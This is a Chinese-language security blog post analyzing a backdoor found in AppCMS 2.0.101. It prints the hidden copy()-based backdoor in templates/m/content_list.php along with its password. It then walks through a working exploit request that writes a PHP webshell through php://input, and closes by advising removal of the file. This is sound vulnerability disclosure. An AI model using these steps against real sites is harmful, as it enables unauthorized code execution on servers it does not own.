Chybeta

AppCMS 2.0.101 后门分析

AppCMS 2.0.101 后门分析

源码

下载地址:http://www.appcms.cc/html/gengxin.html

官方的更新时间是 2015-8-1

分析

用beyond compare比较与前一个版本的区别

可以发现,在 templates/m/ 文件夹下出现了一个 content_list.php 文件,修改时间为 2017年5月25日。

经过解密,9c224bc6b59179729b15e1dddcbb5c82为字符串kejishidai的md5值。

由代码知,这里存在一个copy函数构成的后门。

在第12行,实际执行的即为:

1
copy(trim($_GET[url]),$_GET[cms]);

将参数url设置为php://input,参数cms设置为shell的文件名,然后POST传入webshell。如下:

1
2
3
4
http://127.0.0.1:2500/appcms/appcms_2.0.101/templates/m/content_list.php?session=kejishidai&url=php://input&cms=temp.php
POST:
<?php phpinfo();?>

接着访问:

1
http://127.0.0.1:2500/appcms/appcms_2.0.101/templates/m/temp.php

getshell。

建议

删除 templates/m/ 文件夹下的content_list.php。

Other

cmsPoc

微信扫码加入知识星球【漏洞百出】
chybeta WeChat Pay

点击图片放大,扫码知识星球【漏洞百出】

本文标题:AppCMS 2.0.101 后门分析

文章作者:chybeta

发布时间:2017年12月17日 - 20:12

最后更新:2018年01月25日 - 14:01

原始链接:http://chybeta.github.io/2017/12/17/AppCMS-2-0-101-后门分析/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。